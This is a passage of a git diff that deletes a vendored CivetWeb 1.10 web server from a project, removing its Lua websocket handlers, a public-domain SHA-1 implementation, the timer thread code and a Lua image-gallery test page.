-                   void *ws_arg)
-{
-	struct lua_websock_data *ws = (struct lua_websock_data *)(ws_arg);
-	int err, ok = 0;
-
-	assert(ws != NULL);
-	assert(ws->state != NULL);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	lua_getglobal(ws->state, "data");
-	lua_newtable(ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-	lua_pushstring(ws->state, "bits"); /* TODO: dont use "bits" but fields with
-	                                      a meaning according to
-	                                      http://tools.ietf.org/html/rfc6455,
-	                                      section 5.2 */
-	lua_pushnumber(ws->state, bits);
-	lua_rawset(ws->state, -3);
-	lua_pushstring(ws->state, "data");
-	lua_pushlstring(ws->state, data, data_len);
-	lua_rawset(ws->state, -3);
-
-	err = lua_pcall(ws->state, 1, 1, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, ws->script, "data handler");
-	} else {
-		if (lua_isboolean(ws->state, -1)) {
-			ok = lua_toboolean(ws->state, -1);
-		}
-		lua_pop(ws->state, 1);
-	}
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-	return ok;
-}
-
-
-static int
-lua_websocket_ready(struct mg_connection *conn, void *ws_arg)
-{
-	struct lua_websock_data *ws = (struct lua_websock_data *)(ws_arg);
-	int err, ok = 0;
-
-	assert(ws != NULL);
-	assert(ws->state != NULL);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	lua_getglobal(ws->state, "ready");
-	lua_newtable(ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-	err = lua_pcall(ws->state, 1, 1, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, ws->script, "ready handler");
-	} else {
-		if (lua_isboolean(ws->state, -1)) {
-			ok = lua_toboolean(ws->state, -1);
-		}
-		lua_pop(ws->state, 1);
-	}
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-	return ok;
-}
-
-
-static void
-lua_websocket_close(struct mg_connection *conn, void *ws_arg)
-{
-	struct lua_websock_data *ws = (struct lua_websock_data *)(ws_arg);
-	struct mg_shared_lua_websocket_list **shared_websock_list =
-	    &(conn->ctx->shared_lua_websockets);
-	int err = 0;
-	unsigned i;
-
-	assert(ws != NULL);
-	assert(ws->state != NULL);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	lua_getglobal(ws->state, "close");
-	lua_newtable(ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-
-	err = lua_pcall(ws->state, 1, 0, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, ws->script, "close handler");
-	}
-	for (i = 0; i < ws->references; i++) {
-		if (ws->conn[i] == conn) {
-			ws->references--;
-			ws->conn[i] = ws->conn[ws->references];
-		}
-	}
-	/* TODO: Delete lua_websock_data and remove it from the websocket list.
-	   This must only be done, when all connections are closed, and all
-	   asynchronous operations and timers are completed/expired. */
-	(void)shared_websock_list; /* shared_websock_list unused (see open TODO) */
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-}
-#endif
-
-
-static lua_State *
-mg_prepare_lua_context_script(const char *file_name,
-                              struct mg_context *ctx,
-                              char *ebuf,
-                              size_t ebuf_len)
-{
-	struct lua_State *L;
-	int lua_ret;
-	const char *lua_err_txt;
-
-	(void)ctx;
-
-	L = luaL_newstate();
-	if (L == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "Error: %s",
-		            "Cannot create Lua state");
-		return 0;
-	}
-	civetweb_open_lua_libs(L);
-
-	lua_ret = luaL_loadfile(L, file_name);
-	if (lua_ret != LUA_OK) {
-		/* Error when loading the file (e.g. file not found,
-		 * out of memory, ...)
-		 */
-		lua_err_txt = lua_tostring(L, -1);
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "Error loading file %s: %s\n",
-		            file_name,
-		            lua_err_txt);
-		return 0;
-	}
-
-	/* The script file is loaded, now call it */
-	lua_ret = lua_pcall(L,
-	                    /* no arguments */ 0,
-	                    /* zero or one return value */ 1,
-	                    /* errors as strint return value */ 0);
-
-	if (lua_ret != LUA_OK) {
-		/* Error when executing the script */
-		lua_err_txt = lua_tostring(L, -1);
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "Error running file %s: %s\n",
-		            file_name,
-		            lua_err_txt);
-		return 0;
-	}
-	/*	lua_close(L); must be done somewhere else */
-
-	return L;
-}
-
-
-int
-run_lua(const char *file_name)
-{
-	int func_ret = EXIT_FAILURE;
-	char ebuf[512] = {0};
-	lua_State *L =
-	    mg_prepare_lua_context_script(file_name, NULL, ebuf, sizeof(ebuf));
-	if (L) {
-		/* Script executed */
-		if (lua_type(L, -1) == LUA_TNUMBER) {
-			func_ret = (int)lua_tonumber(L, -1);
-		} else {
-			func_ret = EXIT_SUCCESS;
-		}
-		lua_close(L);
-	} else {
-		fprintf(stderr, "%s\n", ebuf);
-	}
-	return func_ret;
-}
-
-
-static void *lib_handle_uuid = NULL;
-
-static void
-lua_init_optional_libraries(void)
-{
-#if !defined(_WIN32)
-	lib_handle_uuid = dlopen("libuuid.so", RTLD_LAZY);
-	pf_uuid_generate.p =
-	    (lib_handle_uuid ? dlsym(lib_handle_uuid, "uuid_generate") : 0);
-#else
-	pf_uuid_generate.p = 0;
-#endif
-}
-
-
-static void
-lua_exit_optional_libraries(void)
-{
-#if !defined(_WIN32)
-	if (lib_handle_uuid) {
-		dlclose(lib_handle_uuid);
-	}
-#endif
-	pf_uuid_generate.p = 0;
-	lib_handle_uuid = NULL;
-}
-
-
-/* End of mod_lua.inl */
diff --git a/thirdparty/civetweb-1.10/src/sha1.inl b/thirdparty/civetweb-1.10/src/sha1.inl
deleted file mode 100644
index e491a06..0000000
--- a/thirdparty/civetweb-1.10/src/sha1.inl
+++ /dev/null
@@ -1,322 +0,0 @@
-/*
-SHA-1 in C
-By Steve Reid <sreid@sea-to-sky.net>
-100% Public Domain
-
------------------
-Modified 7/98
-By James H. Brown <jbrown@burgoyne.com>
-Still 100% Public Domain
-
-Corrected a problem which generated improper hash values on 16 bit machines
-Routine SHA1Update changed from
-    void SHA1Update(SHA_CTX* context, unsigned char* data, unsigned int
-len)
-to
-    void SHA1Update(SHA_CTX* context, unsigned char* data, unsigned
-long len)
-
-The 'len' parameter was declared an int which works fine on 32 bit machines.
-However, on 16 bit machines an int is too small for the shifts being done
-against
-it.  This caused the hash function to generate incorrect values if len was
-greater than 8191 (8K - 1) due to the 'len << 3' on line 3 of SHA1Update().
-
-Since the file IO in main() reads 16K at a time, any file 8K or larger would
-be guaranteed to generate the wrong hash (e.g. Test Vector #3, a million
-"a"s).
-
-I also changed the declaration of variables i & j in SHA1Update to
-unsigned long from unsigned int for the same reason.
-
-These changes should make no difference to any 32 bit implementations since
-an
-int and a long are the same size in those environments.
-
---
-I also corrected a few compiler warnings generated by Borland C.
-1. Added #include <process.h> for exit() prototype
-2. Removed unused variable 'j' in SHA1Final
-3. Changed exit(0) to return(0) at end of main.
-
-ALL changes I made can be located by searching for comments containing 'JHB'
------------------
-Modified 8/98
-By Steve Reid <sreid@sea-to-sky.net>
-Still 100% public domain
-
-1- Removed #include <process.h> and used return() instead of exit()
-2- Fixed overwriting of finalcount in SHA1Final() (discovered by Chris Hall)
-3- Changed email address from steve@edmweb.com to sreid@sea-to-sky.net
-
------------------
-Modified 4/01
-By Saul Kravitz <Saul.Kravitz@celera.com>
-Still 100% PD
-Modified to run on Compaq Alpha hardware.
-
------------------
-Modified 07/2002
-By Ralph Giles <giles@ghostscript.com>
-Still 100% public domain
-modified for use with stdint types, autoconf
-code cleanup, removed attribution comments
-switched SHA1Final() argument order for consistency
-use SHA1_ prefix for public api
-move public api to sha1.h
-*/
-
-/*
-11/2016 adapted for CivetWeb:
-  include sha1.h in sha1.c,
-  rename to sha1.inl
-  remove unused #ifdef sections
-  make endian independent
-  align buffer to 4 bytes
-  remove unused variable assignments
-*/
-
-/*
-Test Vectors (from FIPS PUB 180-1)
-"abc"
-  A9993E36 4706816A BA3E2571 7850C26C 9CD0D89D
-"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq"
-  84983E44 1C3BD26E BAAE4AA1 F95129E5 E54670F1
-A million repetitions of "a"
-  34AA973C D4C4DAA4 F61EEB2B DBAD2731 6534016F
-*/
-
-#include <string.h>
-#include <stdint.h>
-
-typedef struct {
-	uint32_t state[5];
-	uint32_t count[2];
-	uint8_t buffer[64];
-} SHA_CTX;
-
-#define SHA1_DIGEST_SIZE 20
-
-#define rol(value, bits) (((value) << (bits)) | ((value) >> (32 - (bits))))
-
-/* blk0() and blk() perform the initial expand. */
-/* I got the idea of expanding during the round function from SSLeay */
-
-
-typedef union {
-	uint8_t c[64];
-	uint32_t l[16];
-} CHAR64LONG16;
-
-
-static uint32_t
-blk0(CHAR64LONG16 *block, int i)
-{
-	static const uint32_t n = 1u;
-	if ((*((uint8_t *)(&n))) == 1) {
-		/* little endian / intel byte order */
-		block->l[i] = (rol(block->l[i], 24) & 0xFF00FF00)
-		              | (rol(block->l[i], 8) & 0x00FF00FF);
-	}
-	return block->l[i];
-}
-
-#define blk(block, i)                                                          \
-	(block->l[i & 15] = rol(block->l[(i + 13) & 15] ^ block->l[(i + 8) & 15]   \
-	                            ^ block->l[(i + 2) & 15] ^ block->l[i & 15],   \
-	                        1))
-
-/* (R0+R1), R2, R3, R4 are the different operations used in SHA1 */
-#define R0(v, w, x, y, z, i)                                                   \
-	z += ((w & (x ^ y)) ^ y) + blk0(block, i) + 0x5A827999 + rol(v, 5);        \
-	w = rol(w, 30);
-#define R1(v, w, x, y, z, i)                                                   \
-	z += ((w & (x ^ y)) ^ y) + blk(block, i) + 0x5A827999 + rol(v, 5);         \
-	w = rol(w, 30);
-#define R2(v, w, x, y, z, i)                                                   \
-	z += (w ^ x ^ y) + blk(block, i) + 0x6ED9EBA1 + rol(v, 5);                 \
-	w = rol(w, 30);
-#define R3(v, w, x, y, z, i)                                                   \
-	z += (((w | x) & y) | (w & x)) + blk(block, i) + 0x8F1BBCDC + rol(v, 5);   \
-	w = rol(w, 30);
-#define R4(v, w, x, y, z, i)                                                   \
-	z += (w ^ x ^ y) + blk(block, i) + 0xCA62C1D6 + rol(v, 5);                 \
-	w = rol(w, 30);
-
-
-/* Hash a single 512-bit block. This is the core of the algorithm. */
-static void
-SHA1_Transform(uint32_t state[5], const uint8_t buffer[64])
-{
-	uint32_t a, b, c, d, e;
-
-	/* Must use an aligned, read/write buffer */
-	CHAR64LONG16 block[1];
-	memcpy(block, buffer, sizeof(block));
-
-	/* Copy context->state[] to working vars */
-	a = state[0];
-	b = state[1];
-	c = state[2];
-	d = state[3];
-	e = state[4];
-
-	/* 4 rounds of 20 operations each. Loop unrolled. */
-	R0(a, b, c, d, e, 0);
-	R0(e, a, b, c, d, 1);
-	R0(d, e, a, b, c, 2);
-	R0(c, d, e, a, b, 3);
-	R0(b, c, d, e, a, 4);
-	R0(a, b, c, d, e, 5);
-	R0(e, a, b, c, d, 6);
-	R0(d, e, a, b, c, 7);
-	R0(c, d, e, a, b, 8);
-	R0(b, c, d, e, a, 9);
-	R0(a, b, c, d, e, 10);
-	R0(e, a, b, c, d, 11);
-	R0(d, e, a, b, c, 12);
-	R0(c, d, e, a, b, 13);
-	R0(b, c, d, e, a, 14);
-	R0(a, b, c, d, e, 15);
-	R1(e, a, b, c, d, 16);
-	R1(d, e, a, b, c, 17);
-	R1(c, d, e, a, b, 18);
-	R1(b, c, d, e, a, 19);
-	R2(a, b, c, d, e, 20);
-	R2(e, a, b, c, d, 21);
-	R2(d, e, a, b, c, 22);
-	R2(c, d, e, a, b, 23);
-	R2(b, c, d, e, a, 24);
-	R2(a, b, c, d, e, 25);
-	R2(e, a, b, c, d, 26);
-	R2(d, e, a, b, c, 27);
-	R2(c, d, e, a, b, 28);
-	R2(b, c, d, e, a, 29);
-	R2(a, b, c, d, e, 30);
-	R2(e, a, b, c, d, 31);
-	R2(d, e, a, b, c, 32);
-	R2(c, d, e, a, b, 33);
-	R2(b, c, d, e, a, 34);
-	R2(a, b, c, d, e, 35);
-	R2(e, a, b, c, d, 36);
-	R2(d, e, a, b, c, 37);
-	R2(c, d, e, a, b, 38);
-	R2(b, c, d, e, a, 39);
-	R3(a, b, c, d, e, 40);
-	R3(e, a, b, c, d, 41);
-	R3(d, e, a, b, c, 42);
-	R3(c, d, e, a, b, 43);
-	R3(b, c, d, e, a, 44);
-	R3(a, b, c, d, e, 45);
-	R3(e, a, b, c, d, 46);
-	R3(d, e, a, b, c, 47);
-	R3(c, d, e, a, b, 48);
-	R3(b, c, d, e, a, 49);
-	R3(a, b, c, d, e, 50);
-	R3(e, a, b, c, d, 51);
-	R3(d, e, a, b, c, 52);
-	R3(c, d, e, a, b, 53);
-	R3(b, c, d, e, a, 54);
-	R3(a, b, c, d, e, 55);
-	R3(e, a, b, c, d, 56);
-	R3(d, e, a, b, c, 57);
-	R3(c, d, e, a, b, 58);
-	R3(b, c, d, e, a, 59);
-	R4(a, b, c, d, e, 60);
-	R4(e, a, b, c, d, 61);
-	R4(d, e, a, b, c, 62);
-	R4(c, d, e, a, b, 63);
-	R4(b, c, d, e, a, 64);
-	R4(a, b, c, d, e, 65);
-	R4(e, a, b, c, d, 66);
-	R4(d, e, a, b, c, 67);
-	R4(c, d, e, a, b, 68);
-	R4(b, c, d, e, a, 69);
-	R4(a, b, c, d, e, 70);
-	R4(e, a, b, c, d, 71);
-	R4(d, e, a, b, c, 72);
-	R4(c, d, e, a, b, 73);
-	R4(b, c, d, e, a, 74);
-	R4(a, b, c, d, e, 75);
-	R4(e, a, b, c, d, 76);
-	R4(d, e, a, b, c, 77);
-	R4(c, d, e, a, b, 78);
-	R4(b, c, d, e, a, 79);
-
-	/* Add the working vars back into context.state[] */
-	state[0] += a;
-	state[1] += b;
-	state[2] += c;
-	state[3] += d;
-	state[4] += e;
-}
-
-
-/* SHA1Init - Initialize new context */
-SHA_API void
-SHA1_Init(SHA_CTX *context)
-{
-	/* SHA1 initialization constants */
-	context->state[0] = 0x67452301;
-	context->state[1] = 0xEFCDAB89;
-	context->state[2] = 0x98BADCFE;
-	context->state[3] = 0x10325476;
-	context->state[4] = 0xC3D2E1F0;
-	context->count[0] = context->count[1] = 0;
-}
-
-
-SHA_API void
-SHA1_Update(SHA_CTX *context, const uint8_t *data, const uint32_t len)
-{
-	uint32_t i, j;
-
-	j = context->count[0];
-	if ((context->count[0] += (len << 3)) < j) {
-		context->count[1]++;
-	}
-	context->count[1] += (len >> 29);
-	j = (j >> 3) & 63;
-	if ((j + len) > 63) {
-		i = 64 - j;
-		memcpy(&context->buffer[j], data, i);
-		SHA1_Transform(context->state, context->buffer);
-		for (; i + 63 < len; i += 64) {
-			SHA1_Transform(context->state, &data[i]);
-		}
-		j = 0;
-	} else {
-		i = 0;
-	}
-	memcpy(&context->buffer[j], &data[i], len - i);
-}
-
-
-/* Add padding and return the message digest. */
-SHA_API void
-SHA1_Final(unsigned char *digest, SHA_CTX *context)
-{
-	uint32_t i;
-	uint8_t finalcount[8];
-
-	for (i = 0; i < 8; i++) {
-		finalcount[i] =
-		    (uint8_t)((context->count[(i >= 4 ? 0 : 1)] >> ((3 - (i & 3)) * 8))
-		              & 255); /* Endian independent */
-	}
-	SHA1_Update(context, (uint8_t *)"\x80", 1);
-	while ((context->count[0] & 504) != 448) {
-		SHA1_Update(context, (uint8_t *)"\x00", 1);
-	}
-	SHA1_Update(context, finalcount, 8); /* Should cause a SHA1_Transform() */
-	for (i = 0; i < SHA1_DIGEST_SIZE; i++) {
-		digest[i] =
-		    (uint8_t)((context->state[i >> 2] >> ((3 - (i & 3)) * 8)) & 255);
-	}
-
-	/* Wipe variables */
-	memset(context, '\0', sizeof(*context));
-}
-
-
-/* End of sha1.inl */
diff --git a/thirdparty/civetweb-1.10/src/timer.inl b/thirdparty/civetweb-1.10/src/timer.inl
deleted file mode 100644
index deca4ac..0000000
--- a/thirdparty/civetweb-1.10/src/timer.inl
+++ /dev/null
@@ -1,227 +0,0 @@
-/* This file is part of the CivetWeb web server.
- * See https://github.com/civetweb/civetweb/
- * (C) 2014-2017 by the CivetWeb authors, MIT license.
- */
-
-#if !defined(MAX_TIMERS)
-#define MAX_TIMERS MAX_WORKER_THREADS
-#endif
-
-typedef int (*taction)(void *arg);
-
-struct ttimer {
-	double time;
-	double period;
-	taction action;
-	void *arg;
-};
-
-struct ttimers {
-	pthread_t threadid;               /* Timer thread ID */
-	pthread_mutex_t mutex;            /* Protects timer lists */
-	struct ttimer timers[MAX_TIMERS]; /* List of timers */
-	unsigned timer_count;             /* Current size of timer list */
-};
-
-
-TIMER_API double
-timer_getcurrenttime(void)
-{
-#if defined(_WIN32)
-	/* GetTickCount returns milliseconds since system start as
-	 * unsigned 32 bit value. It will wrap around every 49.7 days.
-	 * We need to use a 64 bit counter (will wrap in 500 mio. years),
-	 * by adding the 32 bit difference since the last call to a
-	 * 64 bit counter. This algorithm will only work, if this
-	 * function is called at least once every 7 weeks. */
-	static DWORD last_tick;
-	static uint64_t now_tick64;
-
-	DWORD now_tick = GetTickCount();
-
-	now_tick64 += ((DWORD)(now_tick - last_tick));
-	last_tick = now_tick;
-	return (double)now_tick64 * 1.0E-3;
-#else
-	struct timespec now_ts;
-
-	clock_gettime(CLOCK_MONOTONIC, &now_ts);
-	return (double)now_ts.tv_sec + (double)now_ts.tv_nsec * 1.0E-9;
-#endif
-}
-
-
-TIMER_API int
-timer_add(struct mg_context *ctx,
-          double next_time,
-          double period,
-          int is_relative,
-          taction action,
-          void *arg)
-{
-	unsigned u, v;
-	int error = 0;
-	double now;
-
-	if (ctx->stop_flag) {
-		return 0;
-	}
-
-	now = timer_getcurrenttime();
-
-	/* HCP24: if is_relative = 0 and next_time < now
-	 *        action will be called so fast as possible
-	 *        if additional period > 0
-	 *        action will be called so fast as possible
-	 *        n times until (next_time + (n * period)) > now
-	 *        then the period is working
-	 * Solution:
-	 *        if next_time < now then we set next_time = now.
-	 *        The first callback will be so fast as possible (now)
-	 *        but the next callback on period
-	*/
-	if (is_relative) {
-		next_time += now;
-	}
-
-	/* You can not set timers into the past */
-	if (next_time < now) {
-		next_time = now;
-	}
-
-	pthread_mutex_lock(&ctx->timers->mutex);
-	if (ctx->timers->timer_count == MAX_TIMERS) {
-		error = 1;
-	} else {
-		/* Insert new timer into a sorted list. */
-		/* The linear list is still most efficient for short lists (small
-		 * number of timers) - if there are many timers, different
-		 * algorithms will work better. */
-		for (u = 0; u < ctx->timers->timer_count; u++) {
-			if (ctx->timers->timers[u].time > next_time) {
-				/* HCP24: moving all timers > next_time */
-				for (v = ctx->timers->timer_count; v > u; v--) {
-					ctx->timers->timers[v] = ctx->timers->timers[v - 1];
-				}
-				break;
-			}
-		}
-		ctx->timers->timers[u].time = next_time;
-		ctx->timers->timers[u].period = period;
-		ctx->timers->timers[u].action = action;
-		ctx->timers->timers[u].arg = arg;
-		ctx->timers->timer_count++;
-	}
-	pthread_mutex_unlock(&ctx->timers->mutex);
-	return error;
-}
-
-
-static void
-timer_thread_run(void *thread_func_param)
-{
-	struct mg_context *ctx = (struct mg_context *)thread_func_param;
-	double d;
-	unsigned u;
-	int re_schedule;
-	struct ttimer t;
-
-	mg_set_thread_name("timer");
-
-	if (ctx->callbacks.init_thread) {
-		/* Timer thread */
-		ctx->callbacks.init_thread(ctx, 2);
-	}
-
-	d = timer_getcurrenttime();
-
-	while (ctx->stop_flag == 0) {
-		pthread_mutex_lock(&ctx->timers->mutex);
-		if ((ctx->timers->timer_count > 0)
-		    && (d >= ctx->timers->timers[0].time)) {
-			t = ctx->timers->timers[0];
-			for (u = 1; u < ctx->timers->timer_count; u++) {
-				ctx->timers->timers[u - 1] = ctx->timers->timers[u];
-			}
-			ctx->timers->timer_count--;
-			pthread_mutex_unlock(&ctx->timers->mutex);
-			re_schedule = t.action(t.arg);
-			if (re_schedule && (t.period > 0)) {
-				timer_add(ctx, t.time + t.period, t.period, 0, t.action, t.arg);
-			}
-			continue;
-		} else {
-			pthread_mutex_unlock(&ctx->timers->mutex);
-		}
-
-/* 10 ms seems reasonable.
- * A faster loop (smaller sleep value) increases CPU load,
- * a slower loop (higher sleep value) decreases timer accuracy.
- */
-#ifdef _WIN32
-		Sleep(10);
-#else
-		usleep(10000);
-#endif
-
-		d = timer_getcurrenttime();
-	}
-
-	pthread_mutex_lock(&ctx->timers->mutex);
-	ctx->timers->timer_count = 0;
-	pthread_mutex_unlock(&ctx->timers->mutex);
-}
-
-
-#ifdef _WIN32
-static unsigned __stdcall timer_thread(void *thread_func_param)
-{
-	timer_thread_run(thread_func_param);
-	return 0;
-}
-#else
-static void *
-timer_thread(void *thread_func_param)
-{
-	timer_thread_run(thread_func_param);
-	return NULL;
-}
-#endif /* _WIN32 */
-
-
-TIMER_API int
-timers_init(struct mg_context *ctx)
-{
-	ctx->timers =
-	    (struct ttimers *)mg_calloc_ctx(sizeof(struct ttimers), 1, ctx);
-	(void)pthread_mutex_init(&ctx->timers->mutex, NULL);
-
-	(void)timer_getcurrenttime();
-
-	/* Start timer thread */
-	mg_start_thread_with_id(timer_thread, ctx, &ctx->timers->threadid);
-
-	return 0;
-}
-
-
-TIMER_API void
-timers_exit(struct mg_context *ctx)
-{
-	if (ctx->timers) {
-		pthread_mutex_lock(&ctx->timers->mutex);
-		ctx->timers->timer_count = 0;
-
-		mg_join_thread(ctx->timers->threadid);
-
-		/* TODO: Do we really need to unlock the mutex, before
-		 * destroying it, if it's destroyed by the thread currently
-		 * owning the mutex? */
-		pthread_mutex_unlock(&ctx->timers->mutex);
-		(void)pthread_mutex_destroy(&ctx->timers->mutex);
-		mg_free(ctx->timers);
-	}
-}
-
-
-/* End of timer.inl */
diff --git a/thirdparty/civetweb-1.10/test/.leading.dot.txt b/thirdparty/civetweb-1.10/test/.leading.dot.txt
deleted file mode 100644
index 0e4b0c7..0000000
--- a/thirdparty/civetweb-1.10/test/.leading.dot.txt
+++ /dev/null
@@ -1 +0,0 @@
-abc123
diff --git a/thirdparty/civetweb-1.10/test/1000images.lua b/thirdparty/civetweb-1.10/test/1000images.lua
deleted file mode 100644
index 8601a42..0000000
--- a/thirdparty/civetweb-1.10/test/1000images.lua
+++ /dev/null
@@ -1,199 +0,0 @@
-mg.write("HTTP/1.1 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html; charset=utf-8\r\n")

-mg.write("\r\n")

-

-t = os.time()

-

-if not mg.request_info.query_string then

-  cnt = 1000

-else

-  cnt = tonumber(mg.get_var(mg.request_info.query_string, "cnt"))

-end

-

-cnt = 100*math.floor(cnt/100)

-

-mg.write([[

-<html>
-  <head>
-    <title>]] .. cnt .. [[ images</title>
-    <script type="text/javascript">
-      var startLoad = Date.now();
-      window.onload = function () {
-        var loadTime = (Date.now()-startLoad) + " ms";
-        document.getElementById('timing').innerHTML = loadTime;
-      }
-    </script>
-  </head>
-  <body>
-    <h1>A large gallery of small images:</h1>
-    <p>
-]])
-for s=0,(cnt/100)-1 do
-local ts = (tostring(t) .. tostring(s))
-mg.write([[
-      <h2>page ]]..s..[[</h2>
-      <table>
-        <tr>
-          <td><img src="imagetest/00.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/01.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/02.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/03.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/04.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/05.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/06.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/07.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/08.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/09.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/10.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/11.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/12.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/13.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/14.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/15.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/16.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/17.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/18.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/19.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/20.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/21.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/22.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/23.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/24.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/25.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/26.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/27.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/28.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/29.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/20.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/21.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/22.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/23.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/24.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/25.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/26.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/27.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/28.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/29.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/30.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/31.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/32.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/33.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/34.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/35.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/36.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/37.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/38.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/39.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/40.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/41.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/42.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/43.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/44.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/45.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/46.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/47.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/48.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/49.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/50.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/51.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/52.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/53.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/54.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/55.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/56.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/57.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/58.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/59.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/60.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/61.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/62.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/63.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/64.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/65.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/66.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/67.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/68.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/69.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/70.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/71.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/72.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/73.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/74.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/75.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/76.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/77.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/78.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/79.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
